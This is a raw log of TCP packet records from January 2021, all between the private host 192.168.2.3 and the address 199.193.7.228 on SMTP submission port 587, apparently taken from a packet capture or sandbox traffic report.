Jan 14, 2021 08:00:22.765182018 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.766222954 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.958322048 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:22.958880901 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.959043026 CET	587	49745	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:22.959383965 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.058871031 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.060815096 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.061861992 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.063549042 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.149172068 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.149359941 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.149434090 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.149456978 CET	587	49745	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.149823904 CET	587	49745	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.152842045 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.249306917 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.249398947 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.249900103 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.250024080 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.251244068 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.251379013 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.252003908 CET	587	49745	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.252134085 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.252428055 CET	587	49745	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.252491951 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.253968000 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.254137993 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.443073988 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.445048094 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.446057081 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.446501017 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.574362040 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.634949923 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.635618925 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.635735989 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.636390924 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.637448072 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.638699055 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.727648020 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.765889883 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.765996933 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.767213106 CET	587	49746	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.767278910 CET	49746	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.828748941 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.842616081 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:23.918335915 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:23.918505907 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.032754898 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.034154892 CET	587	49747	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.035501957 CET	49747	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.052690983 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.110033989 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.110730886 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.243556023 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.243771076 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.300790071 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.300975084 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.301374912 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.435529947 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.435818911 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.491446972 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.506257057 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.543332100 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.626219034 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.626451969 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.626929998 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.696506023 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.698015928 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.698046923 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.698059082 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.698154926 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.733625889 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.733866930 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.734580040 CET	587	49748	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.734662056 CET	49748	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.750607967 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.817307949 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.818674088 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:24.940960884 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:24.944075108 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.009126902 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.010756969 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.010808945 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.010833979 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.010930061 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.135715961 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.136117935 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.201286077 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.204929113 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.278712988 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.325936079 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.326111078 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.326412916 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.395360947 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.396245003 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.396265984 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.396367073 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.396392107 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.469151974 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.469264030 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.469561100 CET	587	49749	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.469670057 CET	49749	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.516190052 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.516858101 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.688299894 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.706769943 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.708204031 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.708230972 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.708252907 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.708345890 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.879235029 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.879362106 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.898286104 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:25.898403883 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:25.901154041 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.044537067 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.070705891 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.081401110 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.090948105 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.091885090 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.091897964 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.091948986 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.091990948 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.234343052 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.234402895 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.234560966 CET	587	49750	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.234610081 CET	49750	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.254611015 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.271672010 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.271816015 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.274288893 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.445470095 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.445683956 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.464620113 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.465214014 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.638529062 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.638777018 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.655533075 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.657145023 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.657176971 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.657201052 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.657285929 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.714422941 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.808726072 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.828948975 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.829519033 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.829797029 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.847551107 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.848587990 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:26.999320984 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:26.999419928 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.000070095 CET	587	49751	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.000138998 CET	49751	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.020015955 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.034667969 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.150623083 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.224951029 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.226514101 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.226541996 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.226557970 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.226671934 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.341192007 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.344218969 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.373936892 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.417084932 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.417234898 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.420478106 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.538213015 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.540309906 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.564749002 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.565223932 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.575236082 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.610793114 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.611766100 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.611792088 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.611875057 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.611938953 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.730356932 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.731218100 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.731501102 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.756948948 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.757746935 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.765579939 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.765894890 CET	587	49752	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.765990019 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.770159006 CET	49752	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.813330889 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.921510935 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.922089100 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:27.948051929 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.948188066 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:27.948502064 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.004206896 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.006340027 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.112066984 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.113540888 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.113570929 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.113589048 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.113687992 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.138797998 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.139513016 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.197808027 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.198223114 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.303802967 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.307254076 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.329916000 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.329952955 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.329971075 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.330121040 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.387693882 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.388465881 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.388714075 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.388906002 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.417833090 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.497376919 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.498327017 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.498351097 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.498413086 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.498461962 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.520468950 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.521615982 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.577832937 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.577961922 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.578191996 CET	587	49753	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.578254938 CET	49753	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.579099894 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.579618931 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.675537109 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.711935043 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.713124037 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.713149071 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.713299036 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.770068884 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.771528959 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.771565914 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.771583080 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.771656036 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.817478895 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.866130114 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.868700027 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.917819977 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:28.962033987 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:28.965501070 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.008080959 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.008940935 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.011194944 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.063112020 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.063569069 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.157372952 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.157469988 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.157510042 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.157680988 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.201597929 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.203421116 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.204258919 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.213339090 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.253845930 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.253979921 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.254336119 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.394779921 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.398005009 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.398833036 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.401135921 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.403966904 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.404520988 CET	587	49755	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.404613972 CET	49755	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.444499969 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.445190907 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.589186907 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.591800928 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.592153072 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.592221975 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.592267036 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.635458946 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.635479927 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.635580063 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.637109995 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.637913942 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.782661915 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.783775091 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.784033060 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.814359903 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.814871073 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.827193975 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.827215910 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.827835083 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.828764915 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.829474926 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:29.974379063 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.974598885 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:29.974828005 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.005197048 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.005994081 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.009483099 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.010454893 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.010606050 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.010724068 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.010849953 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.010945082 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.011023998 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.011113882 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.019655943 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.021900892 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.022403955 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.028439999 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.165138006 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.165654898 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.199923992 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.200758934 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.201064110 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.201087952 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.201211929 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.201289892 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.210921049 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.212397099 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.216159105 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.216453075 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.218494892 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.218590975 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.219099045 CET	587	49756	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.221050024 CET	49756	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.261658907 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.355958939 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.356010914 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.356024027 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.356213093 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.361073017 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.361854076 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.406337976 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.428662062 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.551435947 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.551459074 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.551940918 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.552510023 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.553071976 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.596698046 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.597855091 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.597887039 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.597984076 CET	49754	587	192.168.2.3	199.193.7.228
